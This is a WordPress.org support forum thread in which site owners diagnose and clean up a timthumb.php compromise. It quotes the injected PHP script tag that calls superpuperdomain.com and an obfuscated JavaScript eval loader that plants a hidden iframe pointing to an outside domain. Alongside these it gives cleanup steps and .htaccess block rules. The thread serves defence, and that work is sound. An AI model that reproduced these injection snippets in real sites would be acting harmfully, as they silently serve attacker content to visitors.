WordPress.org

Ready to get started?Download WordPress

Forums

WordPress HTTPS (SSL)
[resolved] Two Strange Errors (35 posts)

  1. cfisher
    Member
    Posted 2 years ago #

    Hello,

    I am using Version 1.9.1 of your plugin.

    Things have worked great for a long time but recently things have gone haywire.

    I have two problems that I cannot seem to figure out.

    1. I am now forced to log into my WordPress admin via https. If log-in via http, I am redirected to the log in each and every time.

    2. For some reason, I started to get browser warnings that my https is not loading secure along with a broken https in the browers URL line. The culprit turned out to be http://superpuperdomain.com/count.php which apparently is WordPress core code (index.php). So I enabled, as suggested in this forum, External HTTPS Elements and Bypass External Check. That fixed the security errors. However, now in Internet Explorer 9, I get this warning, "Internet Explorer block this website from displaying content with security certificate errors." The interesting thing is this appears on non-https pages - even before I reach a https page. This is a new error, and I am confident my security certificate is fine.

    Any suggestions?

    Thanks!
    Chris

  2. bballad
    Member
    Posted 2 years ago #

    You have been hacked, your theme is the culprit

    http://wordpress.org/support/topic/rss-feed-crash?replies=6

  3. cfisher
    Member
    Posted 2 years ago #

    Dang. I think you are right. I checked my index.php against a freshly downloaded WordPress 3.2.1 and indeed it is not part of the core WordPress Code.

    In fact, I found the exact code identified in the link you sent:

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    echo'<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>'; ?>

    Now I need to figure out how to fix this.

    Thanks for your help.

    Chris

  4. OceansDB
    Member
    Posted 2 years ago #

    Going to quote my post for y'all

    Hello,

    I have/had a similar problem, not with my rss though.

    You should read the following about superpuperdomain.com

    What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

    Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

    I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.

    I scoured the Internet and finally found a fix.

    First, in your WordPress’s index.php, remove the following script added by the hack:

    echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

    Then remove three phony files added by the hackers (back up first, in case your installation actually requires these files):

    /wp-admin/js/config.php
    /wp-admin/common.php
    /wp-content/udp.php

    Do not try to open any of these files, as my antivirus sounded alarms immediately.

    I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

    To increase your site’s security, make sure you have correct permissions for files and directories.

    Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

    Run this bash command to set the correct permissions recursively for your WordPress installation:

    chmod -R 0755 /wordpressdirectory

    I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

    order allow,deny
    deny from 91.220
    allow from all

    The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.

    Source: Techspheria

    http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/

    Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php.... Just in case ;-)

    I guess we have to keep monitoring the website TechSperia, because yesterday they said there were two phony files, today there are three.

    Kind regards, OceansDB

  5. Mvied
    Member
    Plugin Author

    Posted 2 years ago #

    Sorry to hear you got hacked. Once the dust settles, let me know if you're having any issue with my plugin.

    Also, not that I've tried any of them, but do you have any security plugins installed? I don't really have any recommendations as I've never used them. I run my own server and tend to keep it on lockdown. I haven't had any issues yet, other than some clever spam bots on one of my Buddypress sites.

  6. OceansDB
    Member
    Posted 2 years ago #

    It is not your plugin. Timthumb.php has a security leak. The TS (topic starter) has to update his timthumb script.

  7. Mvied
    Member
    Plugin Author

    Posted 2 years ago #

    Yes, I know. I can read. Lol.

  8. cfisher
    Member
    Posted 2 years ago #

    Thanks everyone for the posts. I was indeed hacked because of the timthumb. It was used in my theme (elegant themes); The guys at BlogOnCloud9 are wonderful and responsive and already cleaned my website today. Everything is running fine again.

    However, Mvied, I can not figure this one out. I am forced to log-in https on my website. If I log-in http, the log-in fails, and it re-directs to this link: http://www.bmedpress.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.bmedpress.com%2Fwp-admin%2F

    Any suggestions?

    Chris

  9. Mvied
    Member
    Plugin Author

    Posted 2 years ago #

    Hey cfisher,

    I just released version 1.9.2 which has a fix for that issue. I actually ninja'd the fix into 1.9.1, but if you downloaded it before that, the bug would still occur. Update and let me know if that fixes it for you.

    Thanks,
    Mike

  10. cfisher
    Member
    Posted 2 years ago #

    Hi Mvied,

    That fixed it! Thanks for the prompt response and fix. Thanks to the community for their input too.

    All items have been resolved in this thread now.

    Thanks!
    Chris

  11. RoarinRow
    Member
    Posted 2 years ago #

    Thanks for the fix and the suggestions! I found all the files in question.

  12. OceansDB
    Member
    Posted 2 years ago #

    Okay, going to copy paste a few details here. The site you are giving Ipstenu is great, but doesn't inform about the phony files superpuperdomain places in your wordpress installation.

    Please do not forget to delete these files!

    /wp-admin/js/config.php
    /wp-admin/common.php
    /wp-admin/udp.php
    /wp-content/udp.php
    /wp-content/uploads/feed-file.php
    /wp-content/uploads/feed-files.php

    Don't forget to make a .htaccess file outside your public_html with these lines:

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain.com
    deny from superpuperdomain2.com
    allow from all

    Thank you :-)

  13. lfaria
    Member
    Posted 2 years ago #

    Apart from these files, also found:

    / wp-content/e334....php
    / wp-config.php
    / index.php

    Who had injected code.

    Lauro Faria
    http://www.bdibbs.com.br

  14. wolfsteritory
    Member
    Posted 2 years ago #

    ok. so how do we make this update to TimThumb ?

    i deleted those files last week , all was fine, but now it seems i can see any pictures in my websites , that are with external content

    in ftp i see that timthumb.php was modified yesterday !

  15. lfaria
    Member
    Posted 2 years ago #

    Check the version of Timthumb.php.
    Here, it was version 2.4, but adulterated.
    The latest version is 2.7, but compare the official version.
    http://timthumb.googlecode.com/svn/trunk/timthumb.php
    Stay tuned.

  16. OceansDB
    Member
    Posted 2 years ago #

    I filed a complaint at superpuperdomain.com's registrar with some additional information and a virus report. I am very pleased to let y'all know the domain has been suspended :)

  17. jmillgraphics
    Member
    Posted 2 years ago #

    I'm getting crap from superpuperdomain2.com

  18. OceansDB
    Member
    Posted 2 years ago #

    Did you add the .htaccess I suggested?

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain.com
    deny from superpuperdomain2.com
    allow from all

    I also suggest you ban the IP and IP range from those domains. You can use the WP-Ban plugin for this, or any other plugin that works the same.

  19. Elmo_is_evil
    Member
    Posted 2 years ago #

    Hello all, like many of you, one of my site was affected by this crap...

    But I've found something else after cleaning it, a little iframe, in a javascript (Obfuscated), in my case it was in \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js .... `

    var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

    And it's basically add an iframe going to : http://counter-wordpress.com/frame.php .... It's obviously engineer to be stealth ... As it's not showing in your html source, and loaded by a wordpress JS, and is probably don't do much at this moment (Probably in standby) ....

    Anyone else have this ?

  20. OceansDB
    Member
    Posted 2 years ago #

    I have the files, but not the piece of code you are giving.....

  21. Elmo_is_evil
    Member
    Posted 2 years ago #

    Well, i've seen 2 other site who got this, after being affected by the PHPRemoteView via timthumb ....

  22. secretja
    Member
    Posted 2 years ago #

    Dang. Now I see that I have it to...

  23. lfaria
    Member
    Posted 2 years ago #

    Elmo_is_evil

    It did not occur in my case.

  24. lfaria
    Member
    Posted 2 years ago #

    No guarantees, but you can check the dates of the files in your WordPress installation. Those infected are dated the day of infection.

    I made a post in Portuguese, reporting on my case.

    http://www.bdibbs.com.br/2011/falha-de-seguranca-no-timthumb

  25. Mvied
    Member
    Plugin Author

    Posted 2 years ago #

    I checked out http://counter-wordpress.com/frame.php and it appears to load some scripts and then redirect to http://global-traff.com/tds/in.cgi?5&user=mexx and then to http://global-traff.com/tds/in.cgi?mexx and then to http://global-traff.com/tds/in.cgi?18 and then to http://global-traff.com/empity.html.

    The frame.php appears to be the same script from superpuperdomain.com and superpuperdomain2.com.

    After viewing the file once, it will always be blank (it probably stores your IP address and doesn't load anything again afterward). I haven't been able to pull the page back up to prevent the redirect and see exactly what it's loading.

  26. Elmo_is_evil
    Member
    Posted 2 years ago #

    Cool info Mvied, i will check with one of my dynamic ip VPN .....

  27. Cliff Seal
    Member
    Posted 2 years ago #

    Thanks, Elmo_is_evil. Your earlier comment helped me track down the same thing on every WP installation on my server. :)

    If you find this in any other files, please note it and I'll do the same.

  28. Cliff Seal
    Member
    Posted 2 years ago #

    Update:

    The same code was appended to any script in any directory that started with 'jquery'. So, even old versions of jQuery in old plugins, like 'jquery-1.3.2.min.js' were affected.

  29. OceansDB
    Member
    Posted 2 years ago #

    Okay... Now my other site got hacked too. Not by superpuperdomain.com but touchtrip.ru....

    It seems to be a lot more difficult to resolve :-(

    Anyone else got probs with downloading plugins through the backend? Like, get redirected to google, or the malware message from google?

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic